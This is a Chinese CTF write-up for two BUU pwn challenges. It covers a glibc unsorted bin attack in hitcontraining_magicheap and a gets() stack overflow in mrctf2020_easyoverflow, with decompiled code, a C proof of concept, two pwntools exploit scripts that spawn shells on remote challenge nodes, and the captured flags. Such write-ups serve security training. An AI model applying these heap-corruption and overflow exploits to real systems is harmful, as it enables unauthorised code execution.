BUU PWN


hitcontraining_magicheap

只需使

// Decompiled (IDA) fragment of the challenge's menu handler; the enclosing
// function is not shown.  v3 is presumably the menu selection (the exploit
// below sends '4869' at the prompt), which is the hidden "win" branch.
if ( v3 == 4869 )
{
// The only gate is a comparison against the global `magic`: any value up to
// 0x1305 inclusive fails, so a write that raises `magic` above 0x1305 is
// enough to reach l33t().
if ( (unsigned __int64)magic <= 0x1305 )
{
puts("So sad !");
}
else
{
puts("Congrt !");
l33t();
}
}

magic > 0x1305 即可,这可以通过 unsorted bin attack 实现。

unsorted bin attack知识回顾

poc

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Unsorted-bin attack proof of concept (reference link below).  The write
// depends on glibc malloc internals: newer glibc releases add unsorted-bin
// integrity checks that abort at the second malloc(400), so the result
// varies with the libc in use.
int main()
{
char *ptr = NULL, *controllable_chunk, *trigger;

controllable_chunk = malloc(400);
malloc(10); // keep controllable_chunk from being merged into the top chunk when it is freed

free(controllable_chunk);
// controllable_chunk->bk = target - size_t*2
// Write-after-free by design: the freed chunk's bk (second word of its user
// area) is pointed two words before &ptr, so the unlink performed by the
// next malloc of the same size stores a heap pointer into ptr.
((void **)controllable_chunk)[1] = &ptr - 2;

// NOTE: the request must be the same size as the freed chunk, otherwise
// malloc raises an error.
trigger = malloc(400);

fprintf(stderr, "ptr: %p\n ", ptr); // ptr started as NULL; non-NULL here means the write landed

return 0;
}

ref: http://blog.eonew.cn/archives/623

exp

#! /usr/bin/python
# Exploit script for hitcontraining_magicheap on the BUU PWN instance.
# The helpers below wrap the program's numbered menu; `io` is the shared
# connection they all write to.

from pwn import *

#io = process('./magicheap')
io = remote('node3.buuoj.cn', 28961)

def add(sz, d):
    """Drive menu choice '1' (add): send the size ``sz``, then the data ``d``
    at the following prompt.  Writes to the module-level ``io`` connection."""
    for answer in ('1', str(sz)):
        io.sendlineafter(':', answer)
    io.sendafter(':', d)


def rm(idx):
    """Drive menu choice '3' (remove) for the chunk at index ``idx``.
    Writes to the module-level ``io`` connection."""
    choice = '3'
    io.sendlineafter(':', choice)
    io.sendlineafter(':', str(idx))


def edit(idx, sz, d):
    """Drive menu choice '2' (edit): select chunk ``idx``, send the length
    ``sz``, then the data ``d``.  Writes to the module-level ``io`` connection."""
    for answer in ('2', str(idx), str(sz)):
        io.sendlineafter(':', answer)
    io.sendafter(':', d)

# Heap layout: chunk 0 (0x80), chunk 1 (0x400), chunk 2 (0x80).  Chunk 2 keeps
# chunk 1 away from the top chunk, the same role malloc(10) plays in the PoC.
add(0x80, 'A')
add(0x400, 'B')
add(0x80, 'C')

# Free chunk 1; on the glibc this challenge presumably targets it lands in
# the unsorted bin (confirm against the libc in use).
rm(1)
# Overflow out of chunk 0 (allocated with 0x80) into chunk 1's header:
# 0x80 bytes of filler, then prev_size = 0, size = 0x411 (must match the
# freed size, as the PoC notes), fd = 0 and bk = target - 0x10.
# 0x6020A0 is presumably the address of the global `magic` -- verify in the binary.
p = b'\x00' * 0x80
p += p64(0) + p64(0x411)
p += p64(0) + p64(0x6020A0 - 0x10)
edit(0, len(p), p)
# unsorted bin attack
# Re-requesting the same size makes malloc unlink chunk 1 and write through
# the forged bk, which is what pushes `magic` above 0x1305.
add(0x400, 'B')


#gdb.attach(io)
# get shell
# 4869 is the gated menu branch shown in the decompilation above.
io.sendlineafter(':', '4869')
io.interactive()

flag{02e8c026-509a-4dcc-bbdd-47272f8f63bb}

mrctf2020_easyoverflow

main

// Decompiled (IDA) main of mrctf2020_easyoverflow.  The stack offsets in the
// IDA comments are what make the overflow predictable: v5 starts exactly 48
// bytes after v4.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[48]; // [rsp+0h] [rbp-70h] BYREF -- input buffer filled by gets()
char v5[24]; // [rsp+30h] [rbp-40h] BYREF -- immediately follows v4 (0x30 == 48)
__int64 v6; // [rsp+48h] [rbp-28h]
__int64 v7; // [rsp+50h] [rbp-20h]
__int64 v8; // [rsp+58h] [rbp-18h]
__int16 v9; // [rsp+60h] [rbp-10h]
unsigned __int64 v10; // [rsp+68h] [rbp-8h] -- stack-protector canary slot

v10 = __readfsqword(0x28u); // canary load; it sits above v5, so an overwrite that stops at v5 never reaches it
strcpy(v5, "ju3t_@_f@k3_f1@g"); // initial contents differ from fake_flag, so check() fails unless v5 is changed
v6 = 0LL;
v7 = 0LL;
v8 = 0LL;
v9 = 0;
gets(v4, argv); // unbounded read into the 48-byte v4: any longer input spills into v5
if ( !(unsigned int)check((__int64)v5) ) // check() compares v5 against the global fake_flag
exit(0);
system("/bin/sh"); // reached only when check() succeeds
return 0;
}

check

// Decompiled (IDA) comparison routine: returns 1 when the first
// strlen(fake_flag) bytes at a1 equal fake_flag, 0 otherwise.  Only that
// many bytes of a1 are examined; whatever follows them is ignored, so the
// buffer main() passes (v5) does not need to be NUL-terminated to pass.
__int64 __fastcall check(__int64 a1)
{
int i; // [rsp+18h] [rbp-8h]
int v3; // [rsp+1Ch] [rbp-4h]

v3 = strlen(fake_flag); // fake_flag is a global defined elsewhere in the binary
for ( i = 0; ; ++i )
{
if ( i == v3 )
return 1LL; // every byte matched
if ( *(_BYTE *)(i + a1) != fake_flag[i] )
break; // first mismatch
}
return 0LL;
}

gets 存在栈溢出漏洞;v5 的初始内容与 fake_flag 不同,只需通过溢出把 v5 改写为 fake_flag 的内容即可,也就是写入 ‘n0t_r3@11y_f1@g\x00’。

exp

#! /usr/bin/python
from pwn import *

# Exploit script for mrctf2020_easyoverflow on the BUU PWN instance.
#io = process('./mrctf2020_easyoverflow')
io = remote('node3.buuoj.cn', 27093)

# 48 bytes fill v4 in main(); what follows lands in v5, which check()
# compares against fake_flag.
padding = b'A' * 48
expected = b'n0t_r3@11y_f1@g\x00'
payload = padding + expected
io.sendline(payload)

io.interactive()

flag{fd1881f7-e080-4481-b01f-f2e27c15502c}

更新中…
